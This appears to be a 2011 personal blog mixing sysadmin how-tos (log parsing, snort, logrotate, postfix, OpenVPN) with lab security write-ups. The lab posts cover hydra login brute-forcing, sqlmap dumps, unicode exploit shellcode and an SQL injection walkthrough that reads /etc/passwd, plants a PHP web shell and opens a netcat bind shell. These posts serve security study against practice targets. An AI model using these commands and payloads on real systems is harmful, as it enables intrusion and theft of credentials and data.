Monday, December 5, 2011

Helpful log parsing tips

Most programs and services produce logs. When a user visits an apache web server, the service will most likely keep a log of that request, along with the date and the requester's IP address. Other details might be logged as well. Here is an example of some entries in a logfile:

- - [21/Sep/2011:11:04:40 +1000] "GET / HTTP/1.0" 200 468
- - [21/Sep/2011:11:07:48 +1000] "GET /login.php HTTP/1.0" 200 6433

Log files usually contain hundreds of such entries, most, if not all, of which are important to us. If there is an issue with a service, perhaps there is an entry in the logfile that can tell us why. Another scenario is when management requires some statistical information: for example, how many unique IP addresses visited the website in the past hour and what pages they visited, or which web pages are the most frequently visited.

If you look around on the web, you will find tools that can retrieve most of this information for you. However, some of these tools may not have the functionality built in to retrieve all the data you require. Hence, knowing how to do things yourself might come in handy.

Here are some examples. I used the following log entries:

- - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443
- - [21/Sep/2011:11:07:48 -0500] "GET /logo.gif HTTP/1.0" 200 4006
- - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468
- - [21/Sep/2011:11:08:48 -0500] "GET /sports.php HTTP/1.0" 200 98002
- - [21/Sep/2011:11:09:42 -0500] "GET /basketball.htm HTTP/1.0" 200 45869
- - [21/Sep/2011:11:09:48 -0500] "POST /login.php HTTP/1.0" 404 501
- - [21/Sep/2011:11:09:50 -0500] "POST /login.php HTTP/1.0" 404 501
- - [21/Sep/2011:11:09:55 -0500] "GET / HTTP/1.0" 200 6433

We can parse out the unique IP addresses that visited our apache website. We can take this a step further and sort these IP addresses by the number of requests each made. This will give you an idea of which IP addresses chatted with the server the most and which were the least talkative.

awk '{print $1}' access.log | sort | uniq -c | sort -nr
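If you want to try this without a live server, the same pipeline can be run against a small hand-made sample log. The entries below are fabricated for illustration (192.0.2.x and 198.51.100.x are reserved documentation addresses, not real visitors):

```shell
# Build a tiny sample access.log with placeholder client IPs.
cat > /tmp/access.log <<'EOF'
192.0.2.10 - - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443
192.0.2.10 - - [21/Sep/2011:11:07:48 -0500] "GET /logo.gif HTTP/1.0" 200 4006
198.51.100.7 - - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468
EOF

# Field 1 is the client IP: count requests per IP, busiest first.
awk '{print $1}' /tmp/access.log | sort | uniq -c | sort -nr
```

The output here is two lines: 192.0.2.10 with 2 requests, then 198.51.100.7 with 1.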

We can generate statistics based on HTTP status codes. From there, you can see how many successful requests were made, as well as how many bad requests were made for non-existent pages or files. Based on our example log entries above, we should get 6 successful requests and 2 "file not found" requests.

awk '{print $9}' access.log | sort | uniq -c | sort -rn

To see only the log entries that generated an HTTP status code of 404, i.e. "file not found" requests:

awk '$9 == "404"' access.log

Continuing from the last example, if we only wanted to see the IP address and the requested path that triggered the 404 status code:

awk '$9 == "404"{print $1, $7}' access.log

Let's take the last example a little further. Say management wanted to know the number of requests that resulted in a 404 status code between 11 AM and 12 PM on 21/Sep/2011.

awk '$9 == "404"' access.log | egrep "21/Sep/2011" | awk 'substr($4,14,2) == "11"' | wc -l
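Here is a self-contained way to sanity-check that hour filter; the log below is fabricated, and only the two 11-o'clock 404s should be counted:

```shell
# Sample log: two 404s in the 11 o'clock hour, one in the 12 o'clock hour.
cat > /tmp/access404.log <<'EOF'
192.0.2.10 - - [21/Sep/2011:11:09:48 -0500] "POST /login.php HTTP/1.0" 404 501
192.0.2.10 - - [21/Sep/2011:11:09:50 -0500] "POST /login.php HTTP/1.0" 404 501
192.0.2.10 - - [21/Sep/2011:12:01:00 -0500] "GET /x.php HTTP/1.0" 404 501
EOF

# $4 looks like "[21/Sep/2011:11:09:48", so characters 14-15 hold the hour.
awk '$9 == "404"' /tmp/access404.log | grep "21/Sep/2011" \
  | awk 'substr($4,14,2) == "11"' | wc -l
```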

Lastly, if you want to check how many bytes your server served up on a particular day, awk and grep can help us again. The number after the status code in each log entry is the size (in bytes) of the object returned to the client.
In my example, I omit entries with status code "304". I do this because an intelligent user agent (browser) may already have the object in its cache: a 304 indicates that the cached version has the same timestamp as the 'live' version of the file, so the client doesn't need to download it again. If the 'live' file were newer, the response would instead be a 200.

egrep "21/Sep/2011" access.log | awk '$9 != "304"{sum+=$10}END{print sum}'
The result is in bytes. To convert to kilobytes or megabytes, change the print statement at the end to {print sum/1024} or {print sum/1024/1024} respectively.
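Here is the same byte-counting idea in a form you can run directly; the three log lines are made up, and only the two 200 responses (6443 + 468 = 6911 bytes) should be summed:

```shell
# Fabricated sample: one 304 to be excluded, two 200s to be summed.
cat > /tmp/bytes.log <<'EOF'
192.0.2.10 - - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443
192.0.2.10 - - [21/Sep/2011:11:07:48 -0500] "GET /logo.gif HTTP/1.0" 304 0
192.0.2.10 - - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468
EOF

# Sum field 10 (bytes served) for the day, skipping 304s; prints 6911.
grep "21/Sep/2011" /tmp/bytes.log | awk '$9 != "304"{sum+=$10}END{print sum}'
```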

It's important to know that these techniques are not limited to apache log files. Any log file can be parsed using the combination of grep, awk, sort, uniq and even sed (sed can be used to clean up the output). On linux systems, the log files under /var/log can be parsed in similar fashion, with slight modifications to the parameters passed to the programs. If you want to get fancy, you can output the data to a text file and run a php script that reads this file and outputs a nicely formatted HTML report page.
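As a rough sketch of that last idea, the shell alone can also produce a passable HTML report without php; the log contents and file names here are invented for the example:

```shell
# Fabricated sample log for the report.
cat > /tmp/report.log <<'EOF'
192.0.2.10 - - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443
192.0.2.10 - - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468
198.51.100.7 - - [21/Sep/2011:11:08:48 -0500] "GET /forum.php HTTP/1.0" 200 98002
EOF

# Wrap the "top pages" pipeline ($7 is the requested path) in minimal HTML.
{
  echo "<html><body><h1>Top pages</h1><pre>"
  awk '{print $7}' /tmp/report.log | sort | uniq -c | sort -nr
  echo "</pre></body></html>"
} > /tmp/report.html
```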

Resources / Good Reading:

status codes

Wednesday, November 9, 2011

Snort gets a little help from swatch

Want to know who is attacking your network and be notified ASAP? Maybe this setup can help you. Snort is a well-developed open source IDS/IPS (intrusion detection/prevention system). An IDS is basically a sniffer (like tcpdump, wireshark, etc.) that looks at all the packets on the network and keeps an eye out for interesting information. When it sees traffic that might be of interest (like a tcp port scan), it will log the packets pertaining to that scan. An IDS only logs these packets; it doesn't take extra steps to prevent the network attack from happening. An IPS takes the role of the IDS one step further and has the ability to perform other actions in addition to logging. These might include blocking ports, setting firewall rules to block traffic based on port or ip address, etc.

Let's start using snort.

Snort can be used as a regular sniffer, like tcpdump. See the commands below:
# snort -dev -i eth0

To log the packets to a file, use the -l switch and specify a directory. Snort will create the file for you.
# snort -dev -i eth0 -l /root/snort/

Depending on your defaults, snort may log in ascii mode or pcap mode. You can use the -K switch to specify the mode (ascii, pcap or none).
# snort -K ascii -dev -i eth0 -l /root/snort

To log packets in tcpdump (pcap) format, you can use the -b switch by itself.
# snort -b -dev -i eth0 -l /root/snort

Using snort as an IDS

This is accomplished by specifying a config file on the command line.
# snort -c snort.conf -i eth0

I always like to use -A for alert mode. Basically a file called alert gets created, and when bad traffic is seen on the network, snort makes a note of it in this alert file. There are a few options for this mode, but I like using the fast option (see man snort for more details). Note that two files are created: the alert file and the snort.log file. The alert file will contain syslog-like entries when an attack happens, and the snort.log file will contain the bad traffic data (in tcpdump format, if that's the option you went with) that triggered the alerts.
# snort -A fast -c snort.conf -i eth0

The snort.conf file is well documented and easy to configure. Here is a very barebones config file example.

var HOME_NET any
var AIM_SERVERS [,,,,,,,,]

include /etc/snort/classification.config

include $RULE_PATH/icmp.rules

The above example snort.conf will look for bad icmp traffic. If you ping your loopback interface, snort will generate some alerts and start logging this traffic.
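For a concrete sense of what lives inside a rules file, here is a hypothetical entry of the kind icmp.rules contains (the sid value is an arbitrary local-rules number, not from the original config):

```
alert icmp any any -> $HOME_NET any (msg:"ICMP echo request seen"; itype:8; sid:1000001; rev:1;)
```

Rules follow the pattern action protocol source-ip source-port -> dest-ip dest-port (options), so this one alerts on any ICMP echo request headed for the home network.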

How swatch can help you.

I blogged about swatch already so you can refer to my posting on that. Swatch can be used to monitor a snort alert file and be configured to send an email to you when a specific alert gets triggered. See the video below for a demonstration.
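Sketching how that glue might look (every address and the SMTP server below are placeholders): snort's fast-mode alerts carry a "[Priority: N]" tag that swatch can match on, using the same config format as my earlier swatch post:

```
watchfor /Priority: 1/
    echo bold
    exec "/usr/bin/sendemail -f alerts@example.com -t admin@example.com -s smtp.example.com -u 'Snort alert' -m 'High-priority snort alert logged'"
```

You would then run swatch with --examine pointed at snort's alert file instead of a syslog file.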

combining snort and swatch from aerokid240 on Vimeo.

One issue that will arise is that you may start receiving multiple emails. For example, if 4 ping packets were sent from the loopback address, then 4 alerts should be triggered by snort. When swatch is notified about these alerts, 4 emails are sent instead of just one. So if snort fires the same alert 100 times, you can expect 100 emails in this setup. I'm sure you can set swatch to run a script that would overcome this problem, but that is beyond what I wanted to demonstrate in this post.

Resources/Good Reading:

Tuesday, November 8, 2011

Uncloaking the unprotected with DirBuster

The following two paragraphs were taken from the DirBuster project page.

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

However, tools of this nature are often only as good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directories and files that are actually used by developers! DirBuster comes with a total of 9 different lists (further information can be found below); this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough, DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)

Here is a video I've created illustrating one of the ways DirBuster can be used, and why it's very important to take the necessary steps to secure your data rather than just hiding it. Because the webmaster didn't properly configure his webserver for security, it was possible to gain access to some data.

Dirbuster from aerokid240 on Vimeo.

Resources / Good Reading:

Saturday, November 5, 2011

Brute forcing html login forms

Lately, I've been really busy at work and haven't researched or read any books in the past two weeks. Already I felt like my brain was slipping away. So I decided to fire up DVL (Damn Vulnerable Linux), a live distribution with many vulnerabilities for practicing your security skills. I hadn't used it before, so I didn't know what I was getting into. I did a port scan and found two open ports (631 and 3306/mysql). Initially, I tried to identify the MySQL version using metasploit, but that didn't work. I then tried the metasploit mysql bruteforcer to run a dictionary attack on the service, but metasploit complained that the attack would only work on older versions of MySQL. I was clueless. I began looking around the DVL and then started apache (it isn't running by default) from the desktop shortcuts. I went back to my attacking Backtrack 5 machine, fired up Firefox, and went to the relevant URL on the DVL machine. Interestingly enough, it gave me a directory listing. I saw phpmyadmin listed, so I decided to go in there. I was presented with the login page. I tried some random credentials I thought might work and had no success. I was failing miserably. What I needed at that point was to automate the password guessing process. This is where hydra comes in.

This is the command I used.
# hydra -l admin -P passwords.lst -e ns -vV http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

After a few minutes, I had a smile on my face. Hydra found two usable passwords for the username admin. To avoid any spoilers, I won't post the passwords here. Out of curiosity, I decided to run hydra again for the user root.

# hydra -l root -P passwords.lst -f -e ns -vV http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

I used the "-f" switch so hydra would quit immediately once a matching password is found. Indeed, after a few seconds, I had a usable password. In reality, there is nothing too fancy about this, as the accounts and their passwords seem to be at their defaults, and if you know the default mysql account credentials, then bruteforcing here was a waste of time :). Either way, I had a foot in the door, and the point of this was to demonstrate how you can bruteforce html login forms with hydra.
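For reference, the argument to the http-post-form module is three colon-separated pieces, roughly:

```
<path> : <POST body> : <failure string>
/phpmyadmin/index.php : pma_username=^USER^&pma_password=^PASS^&server=1 : denied
```

Hydra substitutes each candidate from -l/-P into ^USER^ and ^PASS^, and treats any response containing the failure string ("denied" here) as a failed guess.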

BTW, adding the "-U" switch will give you usage information for the "http-post-form" service.

Update: It turns out that you can use any username with the password "0", for some reason :). Now that you have access to the mysql database, you can snoop around to get information and user logins for web apps like wordpress and joomla.

Resources/Good Reading:

Monday, September 19, 2011

Mail Serving with Postfix and dovecot

There is a ton of great documentation out there showing you how to set this SMTP server up. Postfix is very popular and a great alternative to the even more popular sendmail. Here are some good resources I used to learn how to set this up:

Ubuntu postfix documentation
Postfix virtual mailbox setup
Centos postfix setup
Centos postfix restrictions

Setting up dovecot is simple enough. Check out the following resources:
Ubuntu dovecot configuration virtual users virtual users example authentication/password schemes
Integrating dovecot SASL with postfix cram-md5 howto

A Postfix/dovecot mail system can make use of actual system users or virtual users. With system users, you would have to create a new system user (e.g., adduser mark) for each mail user. I don't really want to create a new system user every time I add a mail user, so using virtual users with virtual mailboxes suits my installations better (personal preference). The key thing to remember is that you have to make changes to both the postfix and dovecot configurations to get this to work. In postfix, the key settings that need to be modified can be seen here. In dovecot, this example will show you how to set up the virtual user accounts for SASL login authentication.
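As a hedged sketch of the postfix side, the virtual mailbox settings in main.cf tend to look like the following; the domain, paths, and uid/gid values are made-up examples, not defaults:

```
# /etc/postfix/main.cf (excerpt) -- illustrative values only
virtual_mailbox_domains = example.com
virtual_mailbox_base    = /var/mail/vhosts
virtual_mailbox_maps    = hash:/etc/postfix/vmailbox
virtual_uid_maps        = static:5000
virtual_gid_maps        = static:5000
```

Each entry in the vmailbox map then points an address like user@example.com at a mailbox path under virtual_mailbox_base.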

Wednesday, August 31, 2011

File Backups with logrotate

Logrotate is a log rotating program that usually gets executed daily by a cron job. It has a main configuration file located at "/etc/logrotate.conf", and additional configs are usually stored in the "/etc/logrotate.d" directory. The options in the configuration file are dead simple to understand and can be learned from its manpage (man logrotate). Logrotate is mainly used to back up and rotate log files, but it can be used on any file.
The following example will show how to back up contents of the /var/www folder.

First thing we will do is create a directory to house our configuration file and the backups. We will do this in our home directory at "/home/user".

# mkdir backups
# cd /home/user/backups

We then create the config file named rotate.conf:

### logrotate config file
/home/user/backups/www.tar {
    rotate 4
    daily
    compress
    copy
    prerotate
        rm /home/user/backups/www.tar
        tar -cf /home/user/backups/www.tar /var/www
    endscript
}

A quick run-down of the config options:
-The first line gives the path to the file we want to back up and rotate
-rotate 4 will keep up to 4 backups and rotate onwards
-daily is set to have the file rotated daily
-compress will use gzip to compress the rotated file by default
-copy just makes a copy of the original file for backup
-The prerotate directive allows us to run commands before rotating. The commands I used should be straightforward to understand, but anything can go here. You must end the prerotate directive with endscript.

In our setup, logrotate will need a dummy file called www.tar to start off properly, so we will create an empty file with that name:

# touch www.tar

Thats it for the configuration. Now to run logrotate issue the following:

# logrotate -f /home/user/backups/rotate.conf

The "-f" option tells logrotate to force the rotation.

Running this command a few times (7-8) will cause several backups to be created and rotated as needed. You will eventually notice that only 4 backups are kept, as per our configuration.
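Since logrotate is normally driven by cron, you could schedule this particular config yourself; the entry below is a hypothetical root crontab line, with the logrotate path as found on most distributions:

```
# Run the www backup rotation daily at 2 AM
0 2 * * * /usr/sbin/logrotate -f /home/user/backups/rotate.conf
```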

Resources/Good Reading:

Friday, August 26, 2011

Tips on securing apache webserver

I came across a nice article that I wanted to share. It was very useful to me, and I'm sure it will be to someone else as well. I've read other articles on the topic, but I found that this one does the best job of explaining why certain options are used and their benefits. If you have an apache server out there and you're skeptical about its security, then reading this article might put some things into perspective for you and set you on the right path.

Link: Securing Apache

Sunday, August 7, 2011

Automating sql injection with Sqlmap

Sqlmap is an automated sql injection tool written in python. More information can be found at this link.

sqlmap from aerokid240 on Vimeo.

Commands used.

sqlmap -u '' -p 'id' --dbs

sqlmap -u '' -p 'id' -D exploit --tables

sqlmap -u '' -p 'id' -D exploit -T members --columns

sqlmap -u '' -p 'id' -D exploit -T members -C username --dump

sqlmap -u '' -p 'id' -D exploit -T members -C password --dump

Sqlmap options used:
-u Target url
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate

Resources/Good Reading:

Tuesday, August 2, 2011

From SQL injection to Shell

For months and months I avoided this topic. I always assumed that this injection technique was minor and not high risk. So what if you lose email addresses and phone numbers; this stuff is pretty much public knowledge anyway, right? (Google your email address and don't be too surprised by the result.) Of course, at the time I knew absolutely nothing about sql injection and was basing this on pure assumption. Well, now that I've taken a good week to learn as much as I can about the topic, I must say I was overwhelmed by what can be accomplished with this attack. Trust me when I say that writing exploits for windows executables is cool and amazing; sql injection doesn't fall short of coolness either, and I would like to demonstrate this. This demonstration should give you an idea of what the attack is and why it is EXTREMELY dangerous.

Note: This is not a tutorial. Background knowledge of sql injection is required to follow along. I recommend reading up on the basics or checking some of the other resources at the end of the post to get a grasp of the concepts.

The vulnerable app I will be using here is a php website with a MySQL back-end. You can get the download here.


1. Extract the tar.gz file to your web root directory

2. Set up a new database either using CLI or phpMyAdmin and import the "exploit.sql" database

3. You will need to edit the database connection string, which is located in a file named "config.php" in your web root folder and in "config.php" under webroot/admin/. Edit these config files with your sql server address, username, password and database name. That's all. Now just browse to "localhost" to see the web site.

Assuming the website is up and running, we will test for the vulnerability on the newspage.php page. On the homepage, click one of the articles under the "latest news" section and note the URL in the address bar (your id= parameter value may differ based on your selection).

Now add a " ' " at the end of the URL.
Notice that nothing fancy really happens. Typically, you would get a database syntax error message somewhere on the page, but the programmer of this website took the extra step to prevent that. This type of sql injection attack is usually classified as blind sql injection.

Let's try adding a mysql comment character, "#", to the url.
Nothing happened here either.

Let's url-encode the "#", which becomes "%23".
Ah, this completed the query. You would notice this because the page returned information pertaining to this id number, which is a sign of an sql injection vulnerability. You can visualize the query as something like "select * from news where id='1'". With our injected data, the query would look like "select * from news where id='1' #'". The %23 in the url was decoded to "#", the comment symbol in mysql.

The following are the steps I took to enumerate information from the database. I will be manipulating the id= parameter in the url from now on.

  1. Obtain the number of columns returned by the query: id=1' order by x %23, where x is the number of columns. Start with 1, then increment the number until the page returned is no longer valid. I learned that the number of columns returned by the query is 7.
  2. Determine where and which columns are displayed on the page: id=x' union all select 1,2,3,4,5,6,7 %23. You would notice that the third and seventh columns are displayed. We will use the 7th column to enumerate database information.
  3. Enumerate the database name: id=x' union all select 1,2,3,4,5,6,database() %23. The database is exploit.
  4. Enumerate the current user: id=x' union all select 1,2,3,4,5,6,current_user() %23. The current user is root :)
  5. Enumerate the tables: id=x' union all select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema=database() limit x,1 %23, where x acts as an index into the table list. Limit 0,1 returns the first table, limit 1,1 the second, limit 2,1 the third, and so forth.
  6. Enumerate the columns: id=x' union all select 1,2,3,4,5,6,column_name from information_schema.columns where table_schema=database() and table_name='x' limit y,1 %23, where x is a table name obtained in step 5 and y is an integer index as discussed above.
  7. Now we can enumerate the data. We will enumerate the members table, which has three columns: id, username and password. We will get the usernames and their respective passwords: id=x' union all select 1,2,username,4,5,6,password from members limit x,1 %23, where x is an integer index into the query results. You will soon notice that passwords are stored in plain text.
  8. Reading files: id=x' union all select 1,2,3,4,5,6,load_file('/etc/passwd') %23. This will display the contents of the file /etc/passwd.
  9. Let's drop a simple backdoor shell. This only works where there is a directory with write permissions. Assuming /var/www/ is writable by everyone, we can create our backdoor php shell like this:
    id=x' union all select 1,2,3,4,5,6,'<?php system($_GET[cmd]); ?>' into outfile '/var/www/shell.php' %23
    If all went well, browsing to shell.php with ?cmd=ls should list the current directory contents via the "ls" UNIX command.
  10. Let's get a more interactive shell. Using the same shell.php script we wrote to the server, pass it nc -e /bin/bash -lvp 4444 as the command. This sets up a netcat backdoor.
Update: Here is a video demonstration on how most of this is done.

sql injection from aerokid240 on Vimeo.

Resources/Good Reading:
wikipedia vuln web site

Wednesday, June 29, 2011

Challenges in developing unicode exploits

In a previous post, I wrote about exploiting a stack buffer overflow in a vulnerable version of minishare (version 1.4.1). That was basically my interpretation and understanding of lupin's write-up of the same exploit in tutorial form. If you need more elaboration on the exploit writing process, I suggest that you look at his tutorial on exploiting minishare (there are other tutorials as well). There is also a good tutorial on writing exploits over at corelan, and it was the corelan tutorials that got me into unicode exploits. Their very lengthy tutorial on unicode exploits is what made me really understand the challenges in writing such an exploit.

Unicode exploits are basically the same as traditional stack buffer overflow exploits, but they come with a bigger challenge. The idea behind both exploit types is the same: overwrite EIP (or SEH) with a useful address that executes an instruction jumping back to the buffer containing our code. Although the goals are the same, how you go about achieving them differs.

The difference you would notice between a traditional ascii exploit and a unicode one is that every byte is followed by a null (0x00) byte. For example, the string "DOG" in uppercase is "44 4F 47" in ascii bytes. The unicode representation of the same string is "44 00 4F 00 47 00". So when you overwrite a buffer with a crapload of A's in a unicode exploit, each A in the buffer gets a null appended. Your buffer will therefore look like this in bytes: "41 00 41 00 41 00 41 00 41 00 ...".
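You can reproduce this expansion on any linux box; "unicode" in these exploits means UTF-16LE, where each ASCII byte is followed by a null (iconv and od are assumed to be installed):

```shell
# Encode "DOG" as UTF-16LE and dump the raw bytes: 44 00 4f 00 47 00.
printf 'DOG' | iconv -f ASCII -t UTF-16LE | od -An -tx1 | tr -d ' \n'
```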

Usually with unicode exploits, you are quite limited in which memory addresses you can overwrite EIP or SEH with, and you also have a limited instruction set to work with. You must accept that every byte in your supplied buffer will gain a trailing null byte, and work your way from there. This also means your buffer must contain code that is unicode compatible. For example, putting a short jump where the next SEH record resides, i.e. jmp 0x6, is common in seh exploits to hop over the seh address towards your shellcode. This jmp 0x6 in bytes is "eb 06". When we send this in our buffer, nulls get appended to each byte before the code is run, i.e. "eb 00 06 00". If you look at the instructions these bytes represent, it's not what you would've intended. This is a major point that must be kept in mind when dealing with unicode exploits.

You must be wondering how we overcome the limitations discussed earlier. You basically use unicode compatible instructions to accomplish the same thing. These include single byte instructions like push, pop, inc, dec and ret, just to name a few. When using single byte instructions, each instruction must be separated by nop-equivalent code of the form "00 nn 00", where nn is an opcode that gives the effect of a nop instruction. There are not too many opcodes we can use here; some of them are 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x62 and 0x6D. These opcodes, when used in the format "00 nn 00", produce assembly instructions like "add byte ptr [ebp], ch". Replacing nn with one of the other opcode bytes produces something similar. For this to work, however, the relevant register (ebp in our example) must contain a writable address, or an exception will occur. Each opcode byte normally gives you a different register at your disposal. Because the code this produces probably won't affect our buffer (or shellcode), it can be used as filler or nop-like code in between single byte instructions and other relevant pieces of code. If you need further elaboration on this, please read the unicode exploit tutorial over at corelan. They did a great job explaining it, and most importantly, they walk you through developing an exploit using the above mentioned techniques.

Some things to keep in mind.
  1. After you have found that you can overwrite eip or seh, you will need to find a usable unicode compatible address, i.e. one of the form 0x00nn00nn. So in the case of an seh exploit, you are going to need to find the address of a pop pop ret (as in a typical seh exploit), but this address must be in the format 0x00nn00nn. The pvefindaddr plugin for immunity debugger can automate this process.
  2. Make use of single byte instructions like push, pop, inc, dec, and ret, and separate each with one of the nop-like opcodes I mentioned earlier (0x6D, 0x6E, 0x6F, 0x70, 0x71, etc.). This will cause the opcodes to align themselves in a way that is unicode compatible.
  3. Shellcode must be encoded with a unicode compatible encoder. You can use metasploit for this: # msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -t raw | msfencode -e x86/unicode_upper -t raw BufferRegister=EAX
  4. Unicode encoders usually need you to have at least one register pointing to the beginning of the shellcode. Here is an example of how this can be accomplished. Suppose we wanted to get the address 0x00401030 into eax and then jump to it. We can accomplish this like so:
Opcode:         Assembly:

B8 00110011     MOV EAX,11001100
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
2D 00010011     SUB EAX,11000100
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
50              PUSH EAX
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
4C              DEC ESP
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
58              POP EAX
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
05 00300040     ADD EAX,40003000
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
50              PUSH EAX
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
44              INC ESP
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
58              POP EAX
006D 00         ADD BYTE PTR SS:[EBP],CH    //Filler / Nop-like code
C3              RET

If we were to see this as a stream of bytes, it would look like "B8 00 11 00 11 00 6D 00 2D 00 01 00 11 00 6D 00 50 00 6D 00 4C 00 6D 00 58 00 6D 00 05 00 30 00 40 00 6D 00 50 00 6D 00 44 00 6D 00 58 00 6D 00 C3".

This is unicode compatible code, often known as venetian code. Remember that when you are writing your exploit, you will not be including the null bytes; they get inserted automatically for you when your exploit overflows the buffer.

Saturday, June 4, 2011

Automate log monitoring and get email notifications with swatch

The swatch program (simple watcher) can monitor all sorts of logs and respond to certain events when they occur. Its concept is quite simple: swatch monitors a logfile for us, for example /var/log/syslog, and when a specific event (configured in the swatch config file) gets logged, swatch can respond by executing a program, sending an email to a sysadmin, or printing a message to the console where swatch is running.

A simple example of swatch in action: if you are the sole sysadmin of a webserver, you probably want to be notified when someone attempts to log into your server (over ssh or other authentication services). Being the sole admin, no one else has any business being on the system; anyone but the admin attempting to log in obviously doesn't belong there and may have bad intentions. In this case, you can set up swatch to monitor the auth.log file for failed and successful logon attempts, and then send you an email whenever there is a login attempt from anyone. Of course, this will notify you even when you yourself log on, so it may be most practical on an unattended system (maybe you are on vacation or away on business).

I use an email program, actually a perl script, called sendemail. On a debian-based system, you can install it via apt-get install sendemail; likewise, to install swatch, apt-get install swatch. Once both are installed, a simple configuration for swatch is as follows:

watchfor /sshd/
echo bold
bell 3
exec "/usr/bin/sendemail -s -f -xu -xp your_hotmail_pass -u "Log alert" -m "Possible SSHD login attemp" -t -s"

Save the above to a text file with an appropriate name such as swatch.conf

Then we can execute swatch like this:
# swatch --config-file=/path/to/swatch.conf --script-dir=/path/to/your_config_dir --examine=/var/log/auth.log

Whenever someone attempts to log in to your sshd server, the sshd daemon will log the attempt in /var/log/auth.log. Swatch monitors the auth.log file for the string sshd, and whenever it gets a match, it leaves a notification on the console and then sends out the email. Swatch understands regular expressions, so you can perform more advanced matches than a simple string like sshd.

Tuesday, May 31, 2011

OpenVPN Cont. - Adding username/password authentication to openvpn

This post builds on the steps outlined in the previous post. By adding username/password authentication, you are essentially providing a two-factor authentication mechanism for your openvpn server: the client needs a usable client certificate and key to authenticate itself to the server, as well as a valid username and password.

We already discussed certificate authentication in the previous post, so I won't go over that here. To add the user/pass mechanism, we will add one or two lines to our existing configuration files.

In the server config file, add the following:
plugin /usr/lib/openvpn/ system-auth

On the server create a group called vpn
# groupadd vpn

Then we can create each user:
# useradd -s /bin/false -g vpn vpntest   # creates the user and puts them in the vpn group
# passwd vpntest                         # gives the user vpntest a password for authentication
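The plugin line above ends with a PAM service name. "system-auth" is a Red Hat convention; Debian-based systems usually ship "common-auth" instead. If you would rather use a dedicated service, this is a minimal sketch of a hypothetical /etc/pam.d/openvpn that authenticates against local accounts via pam_unix (you would then pass "openvpn" as the plugin's argument instead of "system-auth"):

```
auth    required
account required
```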

On the client config file, add the following line, which makes the client prompt for a username and password:

auth-user-pass
That's it. Keep in mind that we were adding to the config files from the previous post, so it is presumed that you already have a working openvpn server that accepts client key/certificate authentication.


Saturday, May 28, 2011

OpenVPN configs made easy

If you are reading this, I'm assuming you already know what a VPN is. If you are not familiar with the term, you can read this Wikipedia entry to get up to speed with the technology.
This is not a full-featured guide to the "complicated" openvpn software. For quite some time now, I avoided OpenVPN, as I'd always read about how hard it is to set up and configure. I've used other VPN technologies such as Hamachi and Adito. While those solutions are great, I always felt I was holding myself back by not giving OpenVPN a chance. After following some tutorials, some quite simple and others very complex, I am happy to say that I've finally set up an OpenVPN server. The best thing I have taken from this experience is that it's not all that hard to set up. There are guides out there that seem very intimidating on the topic, and my hope is to take that confusion away and give you the quick 101 of openvpn.

---+++Using openvpn with secret key.+++---

I've used Backtrack 5 to setup my server (you can use other linux distros as well)

  1. Install OpenVPN. Backtrack 5 already comes with it pre-installed. If your distro didn't come with it already installed, you can install it by issuing # apt-get install openvpn (applicable to Debian-based systems that use apt for managing packages)
  2. Navigate to openvpn's config dir. # cd /etc/openvpn
  3. Create a secret key. # openvpn --genkey --secret secret.key
  4. By default no config file is available. Let's create one. # touch openvpn.conf
  5. Using your favorite text editor, open up the config file that you've just created and enter in the following:
proto udp # protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to set up
ifconfig <server-vpn-ip> <client-vpn-ip> # the first is the desired IP for our server's virtual interface, the other is the peer's
secret /etc/openvpn/secret.key # secret key used for authentication
cipher AES-128-CBC # encryption cipher to use
user nobody # drop privileges to this user
group nobody # same as above
verb 3 # logging level
That's it for the server setup. Now copy the secret.key file and the openvpn.conf file to another linux client that already has openvpn installed. Note that the server and client config files are almost identical, with a few minor changes. Copy the files to /home/user/.openvpn (this location is not mandatory, but let's be organized).

  1. First change permissions of the config and secret key file. # chmod 644 secret.key ; chmod 644 openvpn.conf
  2. We need to add one line to openvpn.conf and modify the ifconfig parameter, so the client's openvpn.conf file will look like this:
remote <server-public-ip> # the VPN server's real ip
proto udp

port 1194
dev tun
ifconfig <client-vpn-ip> <server-vpn-ip> # notice the change here: the IPs are swapped relative to the server
secret /home/user/.openvpn/secret.key
cipher AES-128-CBC
user nobody
group nobody
verb 3
That's all for the client configuration.

Starting the server and client takes an identical command and requires root privileges. Once you are root, you can start either end like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

